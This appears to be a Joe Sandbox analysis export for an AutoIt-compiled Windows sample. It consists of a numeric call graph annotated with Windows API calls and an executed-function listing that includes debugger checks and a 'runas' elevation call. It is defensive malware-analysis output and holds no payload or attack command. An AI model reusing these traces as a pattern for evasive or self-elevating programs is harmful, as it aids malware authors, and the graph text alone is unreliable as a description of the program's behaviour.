99682->99683 99684 c1207 59 API calls 99683->99684 99685 c2f4f 99684->99685 99686 d0284 60 API calls 99685->99686 99687 c2f5a 99686->99687 99688 c2f65 99687->99688 99691 100177 99687->99691 99690 c4c94 59 API calls 99688->99690 99689 c151f 61 API calls 99689->99691 99692 c2f71 99690->99692 99691->99689 99694 100191 99691->99694 99730 b1307 99692->99730 99695 c2f84 Mailbox 99695->99574 99736 c49c2 99696->99736 99699 ff8d6 99853 119b16 99699->99853 99700 c49c2 136 API calls 99702 c27c3 99700->99702 99702->99699 99704 c27cb 99702->99704 99709 c27d7 99704->99709 99710 ff8f3 99704->99710 99706 ff908 99760 c29be 99709->99760 99917 1147e8 90 API calls _wprintf 99710->99917 99713 ff901 99713->99706 99731 b1319 99730->99731 99735 b1338 _memmove 99730->99735 99733 d0fe6 Mailbox 59 API calls 99731->99733 99732 d0fe6 Mailbox 59 API calls 99734 b134f 99732->99734 99733->99735 99734->99695 99735->99732 99920 c4b29 99736->99920 99741 c49ed LoadLibraryExW 99930 c4ade 99741->99930 99742 1008bb 99743 c4a2f 84 API calls 99742->99743 99745 1008c2 99743->99745 99747 c4ade 3 API calls 99745->99747 99749 1008ca 99747->99749 99956 c4ab2 99749->99956 99750 c4a14 99750->99749 99751 c4a20 99750->99751 99753 c4a2f 84 API calls 99751->99753 99755 c27af 99753->99755 99755->99699 99755->99700 99757 1008f1 99964 c4a6e 99757->99964 99761 ffd14 99760->99761 99762 c29e7 99760->99762 100333 10ff5c 89 API calls 4 library calls 99761->100333 100321 c3df7 60 API calls Mailbox 99762->100321 99854 c4a8c 85 API calls 99853->99854 99855 119b85 99854->99855 100349 119cf1 99855->100349 99917->99713 99969 c4b77 99920->99969 99923 c4b50 99925 c49d4 99923->99925 99926 c4b60 FreeLibrary 99923->99926 99924 c4b77 2 API calls 99924->99923 99927 d547b 99925->99927 99926->99925 99973 d5490 99927->99973 99929 c49e1 99929->99741 99929->99742 100054 c4baa 99930->100054 99933 c4b03 99935 c4a05 99933->99935 99936 c4b15 FreeLibrary 99933->99936 99934 c4baa 2 API calls 99934->99933 99937 c48b0 99935->99937 99936->99935 99938 d0fe6 Mailbox 59 API calls 99937->99938 99939 c48c5 99938->99939 99940 c433f 59 API calls 99939->99940 99941 c48d1 _memmove 99940->99941 99942 c490c 99941->99942 99943 10080a 99941->99943 99944 c4a6e 69 API calls 99942->99944 99947 100817 99943->99947 100063 119ed8 CreateStreamOnHGlobal FindResourceExW LoadResource SizeofResource LockResource 99943->100063 99951 c4915 99944->99951 100064 119f5e 95 API calls 99947->100064 99948 c4ab2 74 API calls 99948->99951 99950 100859 100058 c4a8c 99950->100058 99951->99948 99951->99950 99953 c4a8c 85 API calls 99951->99953 99955 c49a0 99951->99955 99953->99951 99955->99750 99957 100945 99956->99957 99958 c4ac4 99956->99958 100170 d5802 99958->100170 99961 1196c4 100295 11951a 99961->100295 99963 1196da 99963->99757 99965 c4a7d 99964->99965 99966 100908 99964->99966 100300 d5e80 99965->100300 99970 c4b44 99969->99970 99971 c4b80 LoadLibraryA 99969->99971 99970->99923 99970->99924 99971->99970 99972 c4b91 GetProcAddress 99971->99972 99972->99970 99974 d549c __commit 99973->99974 99975 d54af 99974->99975 99978 d54e0 99974->99978 100022 d8d58 58 API calls __getptd_noexit 99975->100022 99977 d54b4 100023 d8fe6 9 API calls __commit 99977->100023 99992 e0718 99978->99992 99981 d54e5 99982 d54ee 99981->99982 99983 d54fb 99981->99983 100024 d8d58 58 API calls __getptd_noexit 99982->100024 99985 d5525 99983->99985 99986 d5505 99983->99986 100007 e0837 99985->100007 100025 d8d58 58 API calls __getptd_noexit 99986->100025 99988 d54bf __commit @_EH4_CallFilterFunc@8 99988->99929 99993 e0724 __commit 99992->99993 99994 d9e3b __lock 58 API calls 99993->99994 99995 e0732 99994->99995 99996 e07ad 99995->99996 100001 d9ec3 __mtinitlocknum 58 API calls 99995->100001 100005 e07a6 99995->100005 100030 d6e7d 59 API calls __lock 99995->100030 100031 d6ee7 LeaveCriticalSection LeaveCriticalSection _doexit 99995->100031 100032 d8a4d 58 API calls 2 library calls 99996->100032 99999 e07b4 99999->100005 100033 da05b InitializeCriticalSectionAndSpinCount 99999->100033 100001->99995 100003 e0823 __commit 100003->99981 100004 e07da EnterCriticalSection 100004->100005 100027 e082e 100005->100027 100015 e0857 __wopenfile 100007->100015 100008 e0871 100038 d8d58 58 API calls __getptd_noexit 100008->100038 100010 e0876 100039 d8fe6 9 API calls __commit 100010->100039 100012 d5530 100026 d5552 LeaveCriticalSection LeaveCriticalSection __wfsopen 100012->100026 100013 e0a8f 100035 e87d1 100013->100035 100015->100008 100021 e0a2c 100015->100021 100040 d39fb 60 API calls 2 library calls 100015->100040 100017 e0a25 100017->100021 100041 d39fb 60 API calls 2 library calls 100017->100041 100019 e0a44 100019->100021 100042 d39fb 60 API calls 2 library calls 100019->100042 100021->100008 100021->100013 100022->99977 100023->99988 100024->99988 100025->99988 100026->99988 100034 d9fa5 LeaveCriticalSection 100027->100034 100029 e0835 100029->100003 100030->99995 100031->99995 100032->99999 100033->100004 100034->100029 100043 e7fb5 100035->100043 100037 e87ea 100037->100012 100038->100010 100039->100012 100040->100017 100041->100019 100042->100021 100044 e7fc1 __commit 100043->100044 100045 e7fd7 100044->100045 100048 e800d 100044->100048 100046 d8d58 __commit 58 API calls 100045->100046 100047 e7fdc 100046->100047 100049 d8fe6 __commit 9 API calls 100047->100049 100050 e807e __wsopen_nolock 109 API calls 100048->100050 100053 e7fe6 __commit 100049->100053 100051 e8029 100050->100051 100052 e8052 __wsopen_helper LeaveCriticalSection 100051->100052 100052->100053 100053->100037 100055 c4af7 100054->100055 100056 c4bb3 LoadLibraryA 100054->100056 100055->99933 100055->99934 100056->100055 100057 c4bc4 GetProcAddress 100056->100057 100057->100055 100059 100923 100058->100059 100060 c4a9b 100058->100060 100065 d5a6d 100060->100065 100062 c4aa9 100063->99947 100064->99951 100068 d5a79 __commit 100065->100068 100066 d5a8b 100096 d8d58 58 API calls __getptd_noexit 100066->100096 100068->100066 100069 d5ab1 100068->100069 100078 d6e3e 100069->100078 100070 d5a90 100097 d8fe6 9 API calls __commit 100070->100097 100077 d5a9b __commit 100077->100062 100079 d6e4e 100078->100079 100080 d6e70 EnterCriticalSection 100078->100080 100079->100080 100081 d6e56 100079->100081 100083 d5ab7 100080->100083 100082 d9e3b __lock 58 API calls 100081->100082 100082->100083 100084 d59de 100083->100084 100085 d59ec 100084->100085 100088 d59fc 100084->100088 100096->100070 100097->100077 100173 d581d 100170->100173 100172 c4ad5 100172->99961 100174 d5829 __commit 100173->100174 100175 d586c 100174->100175 100176 d5864 __commit 100174->100176 100182 d583f _memset 100174->100182 100177 d6e3e __lock_file 59 API calls 100175->100177 100176->100172 100178 d5872 100177->100178 100186 d563d 100178->100186 100180 d5859 100201 d8fe6 9 API calls __commit 100180->100201 100200 d8d58 58 API calls __getptd_noexit 100182->100200 100190 d5658 _memset 100186->100190 100193 d5673 100186->100193 100187 d5663 100291 d8d58 58 API calls __getptd_noexit 100187->100291 100189 d5668 100292 d8fe6 9 API calls __commit 100189->100292 100190->100187 100190->100193 100197 d56b3 100190->100197 100202 d58a6 LeaveCriticalSection LeaveCriticalSection __wfsopen 100193->100202 100194 d57c4 _memset 100294 d8d58 58 API calls __getptd_noexit 100194->100294 100196 d4906 _fprintf 58 API calls 100196->100197 100197->100193 100197->100194 100197->100196 100203 e108b 100197->100203 100271 e0dd7 100197->100271 100293 e0ef8 58 API calls 3 library calls 100197->100293 100200->100180 100201->100176 100202->100176 100204 e10ac 100203->100204 100205 e10c3 100203->100205 100206 d8d24 __commit 58 API calls 100204->100206 100207 e17fb 100205->100207 100211 e10fd 100205->100211 100208 e10b1 100206->100208 100209 d8d24 __commit 58 API calls 100207->100209 100210 d8d58 __commit 58 API calls 100208->100210 100212 e1800 100209->100212 100251 e10b8 100210->100251 100213 e1105 100211->100213 100219 e111c 100211->100219 100214 d8d58 __commit 58 API calls 100212->100214 100216 d8d24 __commit 58 API calls 100213->100216 100215 e1111 100214->100215 100218 d8fe6 __commit 9 API calls 100215->100218 100217 e110a 100216->100217 100223 d8d58 __commit 58 API calls 100217->100223 100218->100251 100220 e1131 100219->100220 100222 e114b 100219->100222 100224 e1169 100219->100224 100219->100251 100221 d8d24 __commit 58 API calls 100220->100221 100221->100217 100222->100220 100228 e1156 100222->100228 100223->100215 100225 d8a4d __malloc_crt 58 API calls 100224->100225 100226 e1179 100225->100226 100229 e119c 100226->100229 100230 e1181 100226->100230 100227 e5e9b __flswbuf 58 API calls 100231 e126a 100227->100231 100228->100227 100234 e1af1 __lseeki64_nolock 60 API calls 100229->100234 100232 d8d58 __commit 58 API calls 100230->100232 100233 e12e3 ReadFile 100231->100233 100238 e1280 GetConsoleMode 100231->100238 100235 e1186 100232->100235 100236 e1305 100233->100236 100237 e17c3 GetLastError 100233->100237 100234->100228 100236->100237 100242 e1294 100238->100242 100243 e12e0 100238->100243 100242->100243 100243->100233 100251->100197 100272 e0df7 100271->100272 100273 e0de2 100271->100273 100277 e0e2c 100272->100277 100278 e6214 __getbuf 58 API calls 100272->100278 100283 e0df2 100272->100283 100274 d8d58 __commit 58 API calls 100273->100274 100275 e0de7 100274->100275 100276 d8fe6 __commit 9 API calls 100275->100276 100276->100283 100279 d4906 _fprintf 58 API calls 100277->100279 100278->100277 100280 e0e40 100279->100280 100281 e0f77 __read 72 API calls 100280->100281 100282 e0e47 100281->100282 100282->100283 100284 d4906 _fprintf 58 API calls 100282->100284 100283->100197 100285 e0e6a 100284->100285 100285->100283 100291->100189 100292->100193 100293->100197 100294->100189 100298 d542a GetSystemTimeAsFileTime 100295->100298 100297 119529 100297->99963 100299 d5458 __aulldiv 100298->100299 100299->100297 100301 d5e8c __commit 100300->100301 100302 d5e9e 100301->100302 100303 d5eb3 100301->100303 100313 d8d58 58 API calls __getptd_noexit 100302->100313 100304 d6e3e __lock_file 59 API calls 100303->100304 100306 d5eb9 100304->100306 100351 119d05 __tzset_nolock _wcscmp 100349->100351 100549 c4d83 100550 c4dba 100549->100550 100551 c4dd8 100550->100551 100552 c4e37 100550->100552 100589 c4e35 100550->100589 100553 c4ead PostQuitMessage 100551->100553 100554 c4de5 100551->100554 100556 c4e3d 100552->100556 100557 1009c2 100552->100557 100583 c4e28 100553->100583 100560 100a35 100554->100560 100561 c4df0 100554->100561 100555 c4e1a DefWindowProcW 100555->100583 100558 c4e65 SetTimer RegisterWindowMessageW 100556->100558 100559 c4e42 100556->100559 100604 bc460 10 API calls Mailbox 100557->100604 100565 c4e8e CreatePopupMenu 100558->100565 100558->100583 100563 100965 100559->100563 100564 c4e49 KillTimer 100559->100564 100607 112cce 97 API calls _memset 100560->100607 100566 c4df8 100561->100566 100567 c4eb7 100561->100567 100570 10096a 100563->100570 100571 10099e MoveWindow 100563->100571 100572 c5ac3 Shell_NotifyIconW 100564->100572 100565->100583 100573 100a1a 100566->100573 100574 c4e03 100566->100574 100594 c5b29 100567->100594 100569 1009e9 100605 bc483 299 API calls Mailbox 100569->100605 100578 10098d SetFocus 100570->100578 100579 10096e 100570->100579 100571->100583 100580 c4e5c 100572->100580 100573->100555 100606 108854 59 API calls Mailbox 100573->100606 100581 c4e9b 100574->100581 100582 c4e0e 100574->100582 100575 100a47 100575->100555 100575->100583 100578->100583 100579->100582 100584 100977 100579->100584 100601 b34e4 DeleteObject DestroyWindow Mailbox 100580->100601 100602 c5bd7 107 API calls _memset 100581->100602 100582->100555 100591 c5ac3 Shell_NotifyIconW 100582->100591 100603 bc460 10 API calls Mailbox 100584->100603 100589->100555 100590 c4eab 100590->100583 100592 100a0e 100591->100592 100593 c59d3 94 API calls 100592->100593 100593->100589 100595 c5b40 _memset 100594->100595 100596 c5bc2 100594->100596 100597 c56f8 87 API calls 100595->100597 100596->100583 100599 c5b67 100597->100599 100598 c5bab KillTimer SetTimer 100598->100596 100599->100598 100600 100d6e Shell_NotifyIconW 100599->100600 100600->100598 100601->100583 100602->100590 100603->100583 100604->100569 100605->100582 100606->100589 100607->100575 100608 b107d 100613 c2fc5 100608->100613 100610 b108c 100611 d2f70 __cinit 67 API calls 100610->100611 100612 b1096 100611->100612 100614 c2fd5 __ftell_nolock 100613->100614 100615 c1207 59 API calls 100614->100615 100616 c308b 100615->100616 100617 d00cf 61 API calls 100616->100617 100618 c3094 100617->100618 100644 d08c1 100618->100644 100621 c1900 59 API calls 100622 c30ad 100621->100622 100623 c4c94 59 API calls 100622->100623 100624 c30bc 100623->100624 100625 c1207 59 API calls 100624->100625 100626 c30c5 100625->100626 100627 c19e1 59 API calls 100626->100627 100628 c30ce RegOpenKeyExW 100627->100628 100629 1001a3 RegQueryValueExW 100628->100629 100633 c30f0 Mailbox 100628->100633 100630 1001c0 100629->100630 100631 100235 RegCloseKey 100629->100631 100632 d0fe6 Mailbox 59 API calls 100630->100632 100631->100633 100643 100247 _wcscat Mailbox __wsetenvp 100631->100643 100634 1001d9 100632->100634 100633->100610 100636 c433f 59 API calls 100634->100636 100635 c1609 59 API calls 100635->100643 100637 1001e4 RegQueryValueExW 100636->100637 100638 100201 100637->100638 100640 10021b 100637->100640 100639 c1821 59 API calls 100638->100639 100639->100640 100640->100631 100641 c1a36 59 API calls 100641->100643 100642 c4c94 59 API calls 100642->100643 100643->100633 100643->100635 100643->100641 100643->100642 100645 e1b70 __ftell_nolock 100644->100645 100646 d08ce GetFullPathNameW 100645->100646 100647 d08f0 100646->100647 100648 c1821 59 API calls 100647->100648 100649 c309f 100648->100649 100649->100621 100650 f01f8 100651 f01fa 100650->100651 100654 114d18 SHGetFolderPathW 100651->100654 100655 c1821 59 API calls 100654->100655 100656 f0203 100655->100656 100657 babb2 100658 babb5 100657->100658 100659 c1207 59 API calls 100658->100659 100665 bac43 100658->100665 100661 bac35 100659->100661 100700 d0588 59 API calls Mailbox 100661->100700 100662 bac6b 100664 c1207 59 API calls 100662->100664 100666 bac75 100664->100666 100678 cff4c 100665->100678 100693 cfe2b 100666->100693 100668 bacbc 100669 baccc GetStdHandle 100668->100669 100670 bad18 100669->100670 100671 f2f39 100669->100671 100672 bad20 OleInitialize 100670->100672 100671->100670 100673 f2f42 100671->100673 100701 1170f3 64 API calls Mailbox 100673->100701 100675 f2f49 100702 1177c2 CreateThread 100675->100702 100677 f2f55 CloseHandle 100677->100672 100679 cff5a 100678->100679 100680 c1207 59 API calls 100679->100680 100681 cff65 100680->100681 100682 c1207 59 API calls 100681->100682 100683 cff70 100682->100683 100684 c1207 59 API calls 100683->100684 100685 cff7b 100684->100685 100686 c1207 59 API calls 100685->100686 100687 cff86 100686->100687 100703 c10c3 100687->100703 100690 d0fe6 Mailbox 59 API calls 100691 cff98 RegisterWindowMessageW 100690->100691 100691->100662 100694 cfe3b 100693->100694 100695 10620c 100693->100695 100696 d0fe6 Mailbox 59 API calls 100694->100696 100706 11a12a 59 API calls 100695->100706 100699 cfe43 100696->100699 100698 106217 100699->100668 100700->100665 100701->100675 100702->100677 100704 c1207 59 API calls 100703->100704 100705 c10cb 100704->100705 100705->100690 100706->100698 100707 b1016 100712 c5ce7 100707->100712 100710 d2f70 __cinit 67 API calls 100711 b1025 100710->100711 100713 d0fe6 Mailbox 59 API calls 100712->100713 100714 c5cef 100713->100714 100716 b101b 100714->100716 100719 c5f39 100714->100719 100716->100710 100720 c5cfb 100719->100720 100721 c5f42 100719->100721 100723 c5d13 100720->100723 100722 d2f70 __cinit 67 API calls 100721->100722 100722->100720 100724 c1207 59 API calls 100723->100724 100725 c5d2b GetVersionExW 100724->100725 100726 c1821 59 API calls 100725->100726 100727 c5d6e 100726->100727 100728 c1981 59 API calls 100727->100728 100733 c5d9b 100727->100733 100729 c5d8f 100728->100729 100730 c133d 59 API calls 100729->100730 100730->100733 100731 c5e00 GetCurrentProcess IsWow64Process 100732 c5e19 100731->100732 100735 c5e2f 100732->100735 100736 c5e98 GetSystemInfo 100732->100736 100733->100731 100734 101098 100733->100734 100747 c55f0 100735->100747 100737 c5e65 100736->100737 100737->100716 100740 c5e8c GetSystemInfo 100742 c5e56 100740->100742 100741 c5e41 100743 c55f0 2 API calls 100741->100743 100742->100737 100745 c5e5c FreeLibrary 100742->100745 100744 c5e49 GetNativeSystemInfo 100743->100744 100744->100742 100745->100737 100748 c5619 100747->100748 100749 c55f9 LoadLibraryA 100747->100749 100748->100740 100748->100741 100749->100748 100750 c560a GetProcAddress 100749->100750 100750->100748 100751 b1055 100756 b2a19 100751->100756 100754 d2f70 __cinit 67 API calls 100755 b1064 100754->100755 100757 c1207 59 API calls 100756->100757 100758 b2a87 100757->100758 100763 b1256 100758->100763 100761 b2b24 100762 b105a 100761->100762 100766 b13f8 59 API calls 2 library calls 100761->100766 100762->100754 100767 b1284 100763->100767 100766->100761 100768 b1275 100767->100768 100769 b1291 100767->100769 100768->100761 100769->100768 100770 b1298 RegOpenKeyExW 100769->100770 100770->100768 100771 b12b2 RegQueryValueExW 100770->100771 100772 b12e8 RegCloseKey 100771->100772 100773 b12d3 100771->100773 100772->100768 100773->100772 100774 b5ff5 100776 b5ede Mailbox _memmove 100774->100776 100775 d0fe6 59 API calls Mailbox 100775->100776 100776->100775 100777 b6abc 100776->100777 100778 b6a9b 100776->100778 100779 b53b0 299 API calls 100776->100779 100781 eeff9 100776->100781 100783 ef007 100776->100783 100788 b60e5 100776->100788 100790 c1c9c 59 API calls 100776->100790 100792 c1a36 59 API calls 100776->100792 100796 12c355 299 API calls 100776->100796 100830 b5569 Mailbox 100776->100830 100979 b523c 59 API calls 100776->100979 100984 117f11 59 API calls Mailbox 100776->100984 100985 106cf1 59 API calls Mailbox 100776->100985 100990 11a48d 89 API calls 4 library calls 100777->100990 100980 ba9de 299 API calls 100778->100980 100779->100776 100992 b5190 59 API calls Mailbox 100781->100992 100993 11a48d 89 API calls 4 library calls 100783->100993 100785 eefeb 100785->100830 100991 106cf1 59 API calls Mailbox 100785->100991 100788->100777 100789 ee137 100788->100789 100798 b63bd Mailbox 100788->100798 100815 b6152 Mailbox 100788->100815 100789->100798 100981 107aad 59 API calls 100789->100981 100790->100776 100792->100776 100795 d0fe6 Mailbox 59 API calls 100797 b63d1 100795->100797 100796->100776 100797->100777 100799 b63de 100797->100799 100798->100795 100805 b6426 100798->100805 100801 b6413 100799->100801 100802 ee172 100799->100802 100801->100805 100831 b5447 Mailbox 100801->100831 100982 12c87c 85 API calls 2 library calls 100802->100982 100983 12c9c9 95 API calls Mailbox 100805->100983 100807 ee19d 100807->100807 100808 d0fe6 59 API calls Mailbox 100808->100831 100809 ef165 100995 11a48d 89 API calls 4 library calls 100809->100995 100810 ee691 100987 11a48d 89 API calls 4 library calls 100810->100987 100813 b69fa 100821 c1c9c 59 API calls 100813->100821 100815->100777 100815->100785 100819 ee2e9 VariantClear 100815->100819 100815->100830 100836 12f1b2 91 API calls 100815->100836 100838 11412a 3 API calls 100815->100838 100841 12e60c 130 API calls 100815->100841 100844 bd679 100815->100844 100884 11413a 100815->100884 100887 bcfd7 100815->100887 100906 11d6be 100815->100906 100951 125e1d 100815->100951 100978 b5190 59 API calls Mailbox 100815->100978 100986 107aad 59 API calls 100815->100986 100817 ee6a0 100818 c1c9c 59 API calls 100818->100831 100819->100815 100820 b69ff 100820->100809 100820->100810 100821->100830 100823 eea9a 100825 c1c9c 59 API calls 100823->100825 100825->100830 100826 c1207 59 API calls 100826->100831 100827 eeb67 100827->100830 100988 107aad 59 API calls 100827->100988 100828 107aad 59 API calls 100828->100831 100831->100808 100831->100810 100831->100813 100831->100818 100831->100820 100831->100823 100831->100826 100831->100827 100831->100828 100831->100830 100832 d2f70 67 API calls __cinit 100831->100832 100833 eef28 100831->100833 100835 b5a1a 100831->100835 100976 b7e50 299 API calls 2 library calls 100831->100976 100977 b6e30 60 API calls Mailbox 100831->100977 100832->100831 100989 11a48d 89 API calls 4 library calls 100833->100989 100994 11a48d 89 API calls 4 library calls 100835->100994 100836->100815 100838->100815 100841->100815 100996 b4f98 100844->100996 100848 d0fe6 Mailbox 59 API calls 100849 bd6aa 100848->100849 100852 bd6ba 100849->100852 101023 c3df7 60 API calls Mailbox 100849->101023 100850 bd6df 100855 b502b 59 API calls 100850->100855 100860 bd6ec 100850->100860 100851 f5068 100851->100850 101028 11fbb7 59 API calls 100851->101028 100854 b4d37 84 API calls 100852->100854 100856 bd6c8 100854->100856 100858 f50b0 100855->100858 100857 c3e47 67 API calls 100856->100857 100859 bd6d7 100857->100859 100858->100860 100861 f50b8 100858->100861 100859->100850 100859->100851 101027 c3f0b CloseHandle 100859->101027 101009 c41d6 100860->101009 100863 b502b 59 API calls 100861->100863 100865 bd6f3 100863->100865 100866 f50ca 100865->100866 100867 bd70d 100865->100867 100869 d0fe6 Mailbox 59 API calls 100866->100869 100868 c1207 59 API calls 100867->100868 100871 bd715 100868->100871 100870 f50d0 100869->100870 100872 f50e4 100870->100872 100874 c3ea1 2 API calls 100870->100874 101024 c3b7b 65 API calls Mailbox 100871->101024 100877 f50e8 _memmove 100872->100877 101014 117c7f 100872->101014 100874->100872 100876 bd724 100876->100877 101025 b4f3c 59 API calls Mailbox 100876->101025 100879 bd738 Mailbox 100880 bd772 100879->100880 100881 c42cf CloseHandle 100879->100881 100880->100815 100882 bd766 100881->100882 100882->100880 101026 c3f0b CloseHandle 100882->101026 100885 11494a 3 API calls 100884->100885 100886 11413f 100885->100886 100886->100815 100888 b4d37 84 API calls 100887->100888 100889 bd001 100888->100889 100890 b5278 59 API calls 100889->100890 100891 bd018 100890->100891 100892 bd57b 100891->100892 100893 b502b 59 API calls 100891->100893 100902 bd439 Mailbox __wsetenvp 100891->100902 100892->100815 100893->100902 100894 d312d _W_store_winword 60 API calls 100894->100902 100895 d0c65 62 API calls 100895->100902 100896 c162d 59 API calls 100896->100902 100897 b4f98 59 API calls 100897->100902 100900 b4d37 84 API calls 100900->100902 100901 b502b 59 API calls 100901->100902 100902->100892 100902->100894 100902->100895 100902->100896 100902->100897 100902->100900 100902->100901 100903 c1821 59 API calls 100902->100903 100904 c59d3 94 API calls 100902->100904 100905 c5ac3 Shell_NotifyIconW 100902->100905 101029 c153b 59 API calls 2 library calls 100902->101029 101030 b4f3c 59 API calls Mailbox 100902->101030 100903->100902 100904->100902 100905->100902 100907 11d6dd 100906->100907 100908 11d6e8 100906->100908 100909 b502b 59 API calls 100907->100909 100910 11d7c2 Mailbox 100908->100910 100912 c1207 59 API calls 100908->100912 100909->100908 100911 d0fe6 Mailbox 59 API calls 100910->100911 100948 11d7cb Mailbox 100910->100948 100913 11d80b 100911->100913 100914 11d70c 100912->100914 100915 11d817 100913->100915 101031 c3df7 60 API calls Mailbox 100913->101031 100916 c1207 59 API calls 100914->100916 100918 b4d37 84 API calls 100915->100918 100919 11d715 100916->100919 100920 11d82f 100918->100920 100921 b4d37 84 API calls 100919->100921 100922 c3e47 67 API calls 100920->100922 100923 11d721 100921->100923 100924 11d83e 100922->100924 100925 d0119 59 API calls 100923->100925 100926 11d842 GetLastError 100924->100926 100927 11d876 100924->100927 100928 11d736 100925->100928 100929 11d85b 100926->100929 100931 11d8a1 100927->100931 100932 11d8d8 100927->100932 100930 c17e0 59 API calls 100928->100930 100929->100948 101032 c3f0b CloseHandle 100929->101032 100933 11d769 100930->100933 100934 d0fe6 Mailbox 59 API calls 100931->100934 100935 d0fe6 Mailbox 59 API calls 100932->100935 100939 11412a 3 API calls 100933->100939 100950 11d793 Mailbox 100933->100950 100936 11d8a6 100934->100936 100940 11d8dd 100935->100940 100941 11d8b7 100936->100941 100944 c1207 59 API calls 100936->100944 100938 b502b 59 API calls 100938->100910 100942 11d779 100939->100942 100943 c1207 59 API calls 100940->100943 100940->100948 101033 11fc0d 59 API calls 2 library calls 100941->101033 100946 c1a36 59 API calls 100942->100946 100942->100950 100943->100948 100944->100941 100947 11d78a 100946->100947 100949 113f1d 63 API calls 100947->100949 100948->100815 100949->100950 100950->100938 100952 125e46 100951->100952 100953 125e74 WSAStartup 100952->100953 100954 b502b 59 API calls 100952->100954 100955 125e9d 100953->100955 100975 125e88 Mailbox 100953->100975 100957 125e61 100954->100957 100956 c40cd 59 API calls 100955->100956 100958 125ea6 100956->100958 100957->100953 100960 b502b 59 API calls 100957->100960 100959 b4d37 84 API calls 100958->100959 100961 125eb2 100959->100961 100962 125e70 100960->100962 100963 c402a 61 API calls 100961->100963 100962->100953 100964 125ebf inet_addr gethostbyname 100963->100964 100965 125edd IcmpCreateFile 100964->100965 100964->100975 100966 125f01 100965->100966 100965->100975 100967 d0fe6 Mailbox 59 API calls 100966->100967 100968 125f1a 100967->100968 100969 c433f 59 API calls 100968->100969 100970 125f25 100969->100970 100971 125f34 IcmpSendEcho 100970->100971 100972 125f55 IcmpSendEcho 100970->100972 100973 125f6d 100971->100973 100972->100973 100974 125fd4 IcmpCloseHandle WSACleanup 100973->100974 100974->100975 100975->100815 100976->100831 100977->100831 100978->100815 100979->100776 100980->100777 100981->100798 100982->100805 100983->100807 100984->100776 100985->100776 100986->100815 100987->100817 100988->100830 100989->100835 100990->100785 100991->100830 100992->100785 100993->100785 100994->100830 100995->100830 100997 b4fa8 100996->100997 100998 edd2b 100996->100998 101003 d0fe6 Mailbox 59 API calls 100997->101003 100999 edd3c 100998->100999 101000 c1821 59 API calls 100998->101000 101001 c19e1 59 API calls 100999->101001 101000->100999 101002 edd46 101001->101002 101006 b4fd4 101002->101006 101008 c1207 59 API calls 101002->101008 101004 b4fbb 101003->101004 101004->101002 101005 b4fc6 101004->101005 101005->101006 101007 c1a36 59 API calls 101005->101007 101006->100848 101006->100851 101007->101006 101008->101006 101010 c410a 2 API calls 101009->101010 101011 c41f7 101010->101011 101012 c410a 2 API calls 101011->101012 101013 c420b 101012->101013 101013->100865 101015 117c8a 101014->101015 101016 d0fe6 Mailbox 59 API calls 101015->101016 101017 117c91 101016->101017 101018 117c9d 101017->101018 101019 117cbe 101017->101019 101020 d0fe6 Mailbox 59 API calls 101018->101020 101021 d0fe6 Mailbox 59 API calls 101019->101021 101022 117ca6 _memset 101020->101022 101021->101022 101022->100877 101023->100852 101024->100876 101025->100879 101026->100880 101027->100851 101028->100851 101029->100902 101030->100902 101031->100915 101032->100948 101033->100948

                                          Executed Functions

                                          Function 000C5240 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 147windowCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          APIs
                                          • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 000C526C
                                          • IsDebuggerPresent.KERNEL32 ref: 000C527E
                                          • GetFullPathNameW.KERNEL32(00007FFF,?,?), ref: 000C52E6
                                            • Part of subcall function 000C1821: _memmove.LIBCMT ref: 000C185B
                                            • Part of subcall function 000BBBC6: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 000BBC07
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 000C5366
                                          • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00100B2E
                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 00100B66
                                          • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00166D10), ref: 00100BE9
                                          • ShellExecuteW.SHELL32(00000000), ref: 00100BF0
                                            • Part of subcall function 000C514C: GetSysColorBrush.USER32(0000000F), ref: 000C5156
                                            • Part of subcall function 000C514C: LoadCursorW.USER32(00000000,00007F00), ref: 000C5165
                                            • Part of subcall function 000C514C: LoadIconW.USER32(00000063), ref: 000C517C
                                            • Part of subcall function 000C514C: LoadIconW.USER32(000000A4), ref: 000C518E
                                            • Part of subcall function 000C514C: LoadIconW.USER32(000000A2), ref: 000C51A0
                                            • Part of subcall function 000C514C: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 000C51C6
                                            • Part of subcall function 000C514C: RegisterClassExW.USER32(?), ref: 000C521C
                                            • Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
                                            • Part of subcall function 000C50DB: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
                                            • Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C513E
                                            • Part of subcall function 000C50DB: ShowWindow.USER32(00000000), ref: 000C5147
                                            • Part of subcall function 000C59D3: _memset.LIBCMT ref: 000C59F9
                                            • Part of subcall function 000C59D3: Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C5A9E
                                          Strings
                                          • AutoIt, xrefs: 00100B23
                                          • runas, xrefs: 00100BE4
                                          • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00100B28
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmpDownload File
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
